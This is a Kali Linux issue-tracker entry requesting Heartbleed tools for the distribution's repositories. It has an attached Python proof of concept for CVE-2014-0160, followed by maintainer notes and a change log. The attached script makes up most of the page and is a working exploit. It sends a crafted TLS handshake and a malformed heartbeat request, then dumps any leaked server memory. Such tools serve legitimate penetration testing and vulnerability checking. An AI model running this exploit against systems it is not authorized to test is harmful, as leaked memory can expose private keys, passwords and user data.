View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0001147 | Kali Linux | New Tool Requests | public | 2014-04-11 19:31 | 2020-03-18 17:47 |
Reporter | Pokeswap | Assigned To | |||
Priority | normal | Severity | feature | Reproducibility | N/A |
Status | closed | Resolution | suspended | ||
Platform | x64 | OS | Kali | OS Version | 1.0 |
Summary | 0001147: heart bleed tools (Heartbleeder, Heartbleed Attack POC and Mass Scanner, Heartbleed Honeypot Script) | ||||
Description | Please add heart bleed tools to the kali repos. | ||||
Attached Files | 2014-0160.py (4,437 bytes)
```python
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
from binascii import unhexlify

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    #x=x.encode('ascii', 'strict')
    return unhexlify(x.replace(' ', '').replace('\n', ''))

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ('  %04x: %-48s %s' % (b, hxdat, pdat))
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print ('Unexpected EOF receiving record header - server closed connection')
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print ('Unexpected EOF receiving record payload - server closed connection')
        return None, None, None
    print (' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print ('No heartbeat response received, server likely not vulnerable')
            return False

        if typ == 24:
            print ('Received heartbeat response:')
            hexdump(pay)
            if len(pay) > 3:
                print ('WARNING: server returned more data than it should - server is vulnerable!')
            else:
                print ('Server processed malformed heartbeat, but did not return any extra data.')
            return True

        if typ == 21:
            print ('Received alert:')
            hexdump(pay)
            print ('Server returned error, likely not vulnerable')
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print ('Connecting...')
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print ('Sending Client Hello...')
    sys.stdout.flush()
    s.send(hello)
    print ('Waiting for Server Hello...')
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print ('Server closed connection without sending Server Hello.')
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print ('Sending heartbeat request...')
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()
```
I have sent an email to the creators of Heartbleed Attack POC and Mass Scanner and Heartbleed Honeypot Script, requesting some info about the license of the tools. For Heartbleeder, it requires a version of the Go language we currently do not support. I'm waiting for the replies. |
|
Code has been updated with GPLv3 and version 0.1.1 |
|
Heartbleed Honeypot Script added |
|
To help speed up the process of evaluating the tool, please make sure to include the following information (the more information you include, the more beneficial it will be for us):
|
|
Wonder if this would be better on exploit-db.com... |
|
No response... Closing. Please reopen if the information can be provided. |
|
Date Modified | Username | Field | Change |
---|---|---|---|
2014-04-11 19:31 | Pokeswap | New Issue | |
2014-04-13 09:20 | crossbower | Note Added: 0001688 | |
2014-04-13 09:21 | crossbower | Assigned To | => crossbower |
2014-04-13 09:21 | crossbower | Status | new => feedback |
2014-04-14 03:07 | glitch | Note Added: 0001691 | |
2014-04-14 10:18 | Pokeswap | File Added: 2014-0160.py | |
2014-04-27 19:56 | crossbower | Note Added: 0001732 | |
2014-05-12 17:16 | | Issue cloned: 0001204 | |
2018-01-26 09:57 | g0tmi1k | Status | feedback => new |
2018-01-26 09:57 | g0tmi1k | Category | Feature Requests => New Tool Requests |
2018-01-29 10:10 | g0tmi1k | Assigned To | crossbower => |
2018-01-29 10:10 | g0tmi1k | Priority | high => normal |
2018-01-29 10:10 | g0tmi1k | Severity | major => minor |
2018-01-29 10:10 | g0tmi1k | Summary | hart bleed tools => heart bleed tools (Heartbleeder, Heartbleed Attack POC and Mass Scanner, Heartbleed Honeypot Script) |
2018-01-29 14:59 | g0tmi1k | Note Added: 0008405 | |
2018-01-30 10:41 | g0tmi1k | Note Added: 0008576 | |
2019-12-09 13:30 | g0tmi1k | Severity | minor => feature |
2020-03-18 17:47 | g0tmi1k | Status | new => closed |
2020-03-18 17:47 | g0tmi1k | Resolution | open => suspended |
2020-03-18 17:47 | g0tmi1k | Note Added: 0012452 |